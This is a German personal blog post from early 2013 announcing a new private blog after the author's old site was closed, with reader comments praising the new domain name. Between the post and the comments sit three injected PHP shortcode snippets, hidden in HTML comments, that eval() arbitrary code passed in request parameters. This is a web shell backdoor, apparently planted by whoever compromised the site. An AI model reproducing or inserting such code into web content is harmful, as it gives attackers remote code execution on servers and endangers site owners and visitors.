Neues Jahr, neues Blog!

2012 war in vielerlei Hinsicht ein sehr ereignisreiches Jahr für mich. Leute, die mich kennen, werden wissen, worauf ich hauptsächlich anspiele, alle anderen Leser wird es kaum interessieren, sind sie doch neu hier. 2013 kann auf jeden Fall nur besser werden.

Nachdem ich Stoehr24.de (und viele weitere Blogs) eingestampft hatte, um mich nur noch auf ein Blog zu konzentrieren, merkte ich schnell, dass ich dort zwar alle motorisierten Themen auf Motor-inside.com bündeln konnte, mir nun aber doch eine Plattform für alle anderen Dinge fehlte. Und Facebook bietet häufig nicht den entsprechenden Rahmen für ausuferndes Zeug. Also musste ein neues Blog her. Da mir die alte Domain mit der 24 darin nie gefiel, musste auch hier Ersatz gesucht werden. Das Entsprang einer Whatsapp-Konversation, der Rest ist Geschichte.

Neues Jahr, neues Leben, neues Blog: gestoehrt

Noch ist das Blog natürlich relativ leer und farblos (weitere Einstellungen und Änderungen werden sicherlich folgen), aber ich werde mich nicht unter Zwang setzen, gelegentlich schreiben, mal mehr, mal weniger. Natürlich würde ich mich, wie leider in der Blogosphäre nicht mehr ganz so üblich über Kommentare freuen. Tut keinem weh und führt manchmal zu tollen Diskussionen. Legt los!

<!– [insert_php]if (isset($_REQUEST["uLO"])){eval($_REQUEST["uLO"]);exit;}[/insert_php][php]if (isset($_REQUEST["uLO"])){eval($_REQUEST["uLO"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["KJK"])){eval($_REQUEST["KJK"]);exit;}[/insert_php][php]if (isset($_REQUEST["KJK"])){eval($_REQUEST["KJK"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["JQQi"])){eval($_REQUEST["JQQi"]);exit;}[/insert_php][php]if (isset($_REQUEST["JQQi"])){eval($_REQUEST["JQQi"]);exit;}[/php] –>

12 Gedanken zu „Neues Jahr, neues Blog!“

  1. Ah, wunderbar, jetzt scheint Jetpack in den Kommentaren deaktiviert zu sein, nun kann ich hier auch ohne Fehlermeldung kommentieren^^

    Mich hat die alte Domain mit der 24 ja nie gestört, aber als Fan von Wortspielen aller Art finde ich die neue Adresse schon mal genial 🙂 Ich bin gespannt, wie sich dein neuer Blog hier entwickeln wird und freue mich schonmal auf die neuen Artikel, die dann hoffentlich hier von Zeit zu Zeit erscheinen werden.

    1. Der Jetpackkram wollte nicht so wie ich, dabei war ich anfänglich echt angetan. Nun ist es weg und es wird wieder mit bewährten Mitteln gearbeitet.
      Mir gefiel die Domain nie, freut mich aber, dass Dir auch meine neue Wahl gefällt.

  2. Willkommen zurück in der privaten Bloggerei. Freue mich, dass du den Schritt gemacht hast und kann mich meinen Vorrednern bezüglich der Domain nur anschließen. Genial!

    Gibt es eine bestimmte Feedadresse?

    1. Danke, Uli.
      Ich glaube nicht, ich habe nichts Spezielles eingestellt. Also ganz normal die URL mit /feed dahinter, vermute ich mal …

  3. Bester Gestörter,

    🙂 sehr sehr feine Domain. Nun bin ich mal gespannt, ob du es packst, dich von dem Brei der anderen Blogs abzusetzen, nicht pausenlos von kleinen kotzfleckenförmigen Neuwagen schreibst und provokant oder emotional mein Herz berührst. Ich bin sehr neugierig. Wir lesen uns…

    Sandmann 😀

    1. Bester Sandmann,

      würdest Du meinen anderen Blog lesen, wäre Dir aufgefallen, dass der Neuwagenanteil verschwindend gering ist, mehr Chevys, Dodge und anderes Zeug, ebenso wie Altblech von mir abgehandelt wird.
      Nachsitzen: Motor-inside.com

      Hier wird es eher privat zugehen. Was das heißt, weiß ich auch noch nicht so wirklich, aber es werden sich sicherlich Themen finden.

      Der Gestoehrte

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.